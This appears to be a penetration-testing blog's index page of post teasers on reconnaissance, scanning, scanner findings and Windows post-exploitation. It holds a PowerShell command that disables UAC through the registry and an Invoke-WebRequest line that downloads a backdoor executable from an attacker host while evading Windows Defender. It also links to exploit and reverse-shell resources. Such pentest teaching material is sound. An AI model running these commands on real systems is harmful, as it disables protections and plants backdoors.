Penetration Testing

Samba Exploits

Search in exploit-db searchsploit --color samba | grep 'linux\/' | grep -v '/dos/'searchsploit --color samba | grep 'linux\/' | grep -v '/dos/'  Read More »

Uploading / Downloading Files

After we gained a foothold on our target (exploitation) we want to upload and download files.Read More »

OS Fingerprinting

Tools nmap OS Detection xprobe2  Read More »

Scanning udp port 1434 SQL Browser

Objective On UDP port 1434 is most likely the MS SQL Browser Service listening. You can query this service to retrieve version info and the TCP port where MS SQL Server Service is listening. Nmap nmap -P0 -v -sU -sV -p 1434 <ip> --script ms-sql-infonmap -P0 -v -sU -sV -p 1434 <ip> --script ms-sql-infoRead More »

UDP port Scanning

  References Nmap UDP Protocol ScannerRead More »

Privilege Escalation

References Basic Linux Privilege Escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Windows Privilege Escalation http://www.fuzzysecurity.com/tutorials/16.html http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BzIszsQ%2FYRU%2BiWuuAK42a9w%3D%3D  https://github.com/ankh2054/windows-pentest?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BzIszsQ%2FYRU%2BiWuuAK42a9w%3D%3D https://github.com/SecWiki/windows-kernel-exploits https://github.com/abatchy17/WindowsExploits  Read More »

Reverse Shells

References http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet    Read More »

Scan Public WebServer SSL/TLS configuration via online tools

Objective: Check your webserver SSL/TLS configuration via online tools.Read More »

No Custom Errors implemented

Often, during a penetration test on web applications, we come up against many error codes generated from applications or web servers. It’s possible to cause these errors to be displayed by using a particular requests, either specially crafted with tools or created manually. These codes are very useful to penetration testers during their activities, because […]Read More »

ASP.NET DEBUG enabled

Nikto Output DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.Read More »

The X-Content-Type-Options header is not set

Nikto Output The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME typeRead More »

Link-Local Multicast Name Resolution (LLMNR) Detection

 Nessus Output Synopsis : The remote device supports LLMNR. Description : The remote device answered to a Link-local Multicast Name Resolution (LLMNR) request. This protocol provides a name lookup service similar to NetBIOS or DNS. It is enabled by default on modern Windows versions. Reported Risk factor by Nessus: None In my option the severity should […]Read More »

AtomBombing

Description Code injection technique published by ensilo. AtomBombing: Brand New Code Injection for WindowsRead More »

Verify HTTP response headers

Objective Verify the HTTP Response headers of your Web Site/Apps.Read More »

Content-Type header missing

You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Netsparker will report this issue during your scanning phase.Read More »

X-Frame-Options header is not set

You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Nessus will report this issue during your scanning phase.Read More »

Password autocomplete in browser

You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Nessus will report this issue during your scanning phase.Read More »

Metasploit Links

Links Metasploit Unleashed Free Online Security Training Metasploit Minute Metasploit Megaprimer Metasploit Cheat Sheet Metasploit on GithubRead More »

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553)

Nessus Output Description The version of Windows running on the remote host is affected by a vulnerability in the HTTP protocol stack (HTTP.sys) due to improperly parsing crafted HTTP requests. A remote attacker can exploit this to execute arbitrary code with System privileges.Read More »

vFeed Usage / Cheat Sheet

What is vFeed Cross Linked and Aggregated Local Vulnerability Database https://github.com/toolswatch/vFeed http://www.vfeed.io/Read More »

Pentest Methodologies

There are many Pentest Methodologies that all share the same basic approach but their phases are named differently: Pre-engagement steps / Preparation / Scoping Intelligence Gathering / Information Gathering / Reconnaissance (Recon) / Open source intelligence (OSINT) / Footprinting Threat Modeling Scanning / Mapping / Enumeration / Vulnerability Analysis / Discovery Exploitation Post-Exploitation / Maintaining Access / […]Read More »

Brute forcing DNS Records

Test Objectives Perform name lookups with a wordlist (dictionary attack) to identify services/hosts/websites in the target domain. Only applicable if Check for DNS zone transfer failed.Read More »

Check for Reverse DNS lookup presence

Test Objective: Obtain valid server names and aliases for the IP addresses in the defined scope of the test. Only applicable if Check for DNS zone transfer failed.Read More »

Check for DNS zone transfer

Test Objective Test if the authoritative nameservers are allowing zone transfers for the domains in scope.Read More »

BING IP Search

Test Objectives To understand what sensitive design and configuration information of the application/system/organization is exposed both directly (on the organization’s website) or indirectly (on a third party website). (from the OWASP Testing Guide v4.0 Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)Read More »

Fingerprint Web Server (Active)

Test Objectives Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits to use during testing. (OWASP Testing Guide v4.0 – OTG-INFO-002)Read More »

Fingerprint Web Server (Passive)

Test Objectives Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits to use during testing. (OWASP Testing Guide v4.0 – Fingerprint Web Server OTG-INFO-002)Read More »

Shodan Search

Test Objectives To understand what sensitive design and configuration information of the application/system/organization is exposed both directly (on the organization’s website) or indirectly (on a third party website). (from the OWASP Testing Guide v4.0 Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)Read More »

Locate the Target Web Presence

Test Objective: Locate and record the target website(s).Read More »

Check for DNS software version

Test Objective: Check if the DNS servers are vulnerable to version queries. Analyze the reported version for vulnerabilities and available exploits.Read More »

Check For Authoritative Name Servers

Objective: List the authoritative name server for the target domain(s).Read More »

Find Out Domain Registration Info and IP Block Owned

Objectives: Determine iprange of target(s) Determine nameservers of target(s) Determine ASnumber or target(s) Determine registrar of target (provider) Determine address information of Registrar Identify administrative contacts Collect telephone numbers Gather EmailaddressesRead More »

Disable User Access Control (UAC)

  Powershell: New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -ForceNew-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force Reboot required! Links: What pentesters should know about UAC Bypass UAC on Windows 8.1  Read More »

Sort IP addresses

Bash: sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 Powershell: gc .\ips.txt | sort {"{0:d3}.{1:d3}.{2:d3}.{3:d3}" -f @([int[]]$_.split(‘.’)) }gc .\ips.txt | sort {"{0:d3}.{1:d3}.{2:d3}.{3:d3}" -f @([int[]]$_.split(‘.’)) } Excel: Use the following formula to calculate a number which we can sort on (cell […]Read More »

Downloading files via the commandline (Windows)

Objective Methods to download files via the Windows commandline.Read More »

Disarm Windows Defender

When we try to download a backdoor program Windows Defender will block the file. Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"Read More »

Pingsweeps

A few code snippets to perform ping sweeps:Read More »